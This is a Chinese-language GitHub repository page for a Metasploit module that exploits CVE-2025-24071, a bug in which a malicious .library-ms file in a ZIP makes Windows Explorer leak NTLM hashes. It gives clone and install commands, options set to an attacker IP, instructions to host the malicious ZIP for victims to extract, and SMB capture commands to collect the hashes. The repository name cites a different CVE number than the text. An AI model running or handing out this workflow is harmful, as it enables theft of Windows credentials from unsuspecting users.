Fomovet/cve-2025-24054
GitHub: Fomovet/cve-2025-24054
一个 Metasploit 辅助模块,用于利用 CVE-2025-24071 通过恶意 `.library-ms` 文件触发 NTLM hash 泄露的漏洞验证。
Stars: 0 | Forks: 0
## CVE-2025-24071:通过 .library-ms 文件泄露 NTLM Hash(Metasploit 模块)
本仓库包含一个用于利用 CVE-2025-24071 的 **Metasploit 模块**,该漏洞存在于 Windows Explorer 中,当从 ZIP 压缩包中解压恶意的 `.library-ms` 文件时会导致 NTLM hash 泄露。
开发者:**FOLKS-IWD**
## **概述**
当用户解压包含特殊构造的 `.library-ms` 文件的 ZIP 压缩包时,就会触发此漏洞。Windows Explorer 会自动向文件中指定的远程服务器发起 SMB 身份验证请求,在无需任何用户交互的情况下泄露用户的 NTLM hash。
此 Metasploit 模块将:
1. 生成恶意的 `.library-ms` 文件。
2. 将其打包成 ZIP 压缩包。
3. 与 Metasploit 的 SMB 捕获功能集成以收集 NTLM hash。
## **安装说明**
1. 克隆仓库:
git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
cd CVE-2025-24071-msfvenom
2. 将模块复制到您的 Metasploit 模块目录中:
cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
## **用法**
1. 加载模块:
use auxiliary/server/ntlm_hash_leak
2. 设置所需选项:
set ATTACKER_IP 192.168.1.162 # 替换为您的 IP 地址
set FILENAME exploit.zip # 恶意 ZIP 文件的名称
set LIBRARY_NAME malicious.library-ms # .library-ms 文件的名称
set SHARE_NAME shared # SMB 共享名称
3. 运行模块:
```
run
```
4. 模块将生成一个恶意的 ZIP 文件(exploit.zip)。托管此文件以供受害者下载并解压。
5. 使用 Metasploit 的 SMB 捕获模块来收集 NTLM hash:
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162 # 与 ATTACKER_IP 相同
run
标签:Conpot, StruQ, Windows安全, 凭据窃取